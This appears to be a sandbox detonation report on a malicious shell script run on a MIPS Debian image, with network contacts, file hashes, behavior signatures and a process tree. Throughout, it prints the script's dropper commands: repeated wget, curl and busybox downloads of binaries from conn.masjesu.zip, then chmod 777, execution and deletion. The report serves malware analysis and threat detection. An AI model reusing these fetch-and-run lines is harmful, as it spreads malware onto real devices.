[wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/chmod

[chmod 777 VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh

[./VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/rm

[rm VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/chmod

[chmod 777 tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv

[./tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/rm

[rm tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/chmod

[chmod 777 Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq

[./Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/rm

[rm Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/chmod

[chmod 777 dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl

[./dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/rm

[rm dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N

MD5 7689ca8c5bc85cf6b78ef89323d4df6a
SHA1 a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA256 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA512 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

/tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-29 02:53

Reported

2024-10-29 02:55

Platform

debian9-mipsel-20240611-en

Max time kernel

124s

Max time network

148s

Command Line

[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N N/A
N/A /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J N/A
N/A /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX N/A
N/A /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg N/A
N/A /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww N/A
N/A /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd N/A
N/A /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh N/A
N/A /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv N/A
N/A /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq N/A
N/A /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z N/A
N/A /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o N/A
N/A /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 N/A
N/A /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq N/A
N/A /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl N/A
N/A /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N N/A
N/A /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J N/A
N/A /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX N/A
N/A /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg N/A
N/A /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww N/A
N/A /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd N/A
N/A /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh N/A
N/A /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv N/A
N/A /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq N/A
N/A /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl N/A
N/A /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq N/A
N/A /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z N/A
N/A /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o N/A
N/A /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z /usr/bin/curl N/A
File opened for modification /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq /usr/bin/curl N/A
File opened for modification /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq /usr/bin/curl N/A
File opened for modification /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z /usr/bin/curl N/A
File opened for modification /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 /usr/bin/curl N/A
File opened for modification /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX /usr/bin/curl N/A
File opened for modification /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv /usr/bin/curl N/A
File opened for modification /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 /usr/bin/curl N/A
File opened for modification /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww /usr/bin/curl N/A
File opened for modification /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq /usr/bin/curl N/A
File opened for modification /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o /usr/bin/curl N/A
File opened for modification /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J /usr/bin/curl N/A
File opened for modification /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd /usr/bin/curl N/A
File opened for modification /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N /usr/bin/curl N/A
File opened for modification /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd /usr/bin/curl N/A
File opened for modification /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv /usr/bin/curl N/A
File opened for modification /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl /usr/bin/curl N/A
File opened for modification /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N /usr/bin/curl N/A
File opened for modification /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg /usr/bin/curl N/A
File opened for modification /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX /usr/bin/curl N/A
File opened for modification /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o /usr/bin/curl N/A
File opened for modification /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg /usr/bin/curl N/A
File opened for modification /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh /usr/bin/curl N/A
File opened for modification /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl /usr/bin/curl N/A
File opened for modification /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J /usr/bin/curl N/A
File opened for modification /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww /usr/bin/curl N/A
File opened for modification /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh /usr/bin/curl N/A
File opened for modification /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq /usr/bin/curl N/A

Processes

/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh

[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/chmod

[chmod 777 ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N

[./ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/rm

[rm ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/chmod

[chmod 777 MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J

[./MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/rm

[rm MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/chmod

[chmod 777 ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX

[./ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/rm

[rm ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/chmod

[chmod 777 lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg

[./lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/rm

[rm lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/chmod

[chmod 777 dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww

[./dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/rm

[rm dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/chmod

[chmod 777 Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd

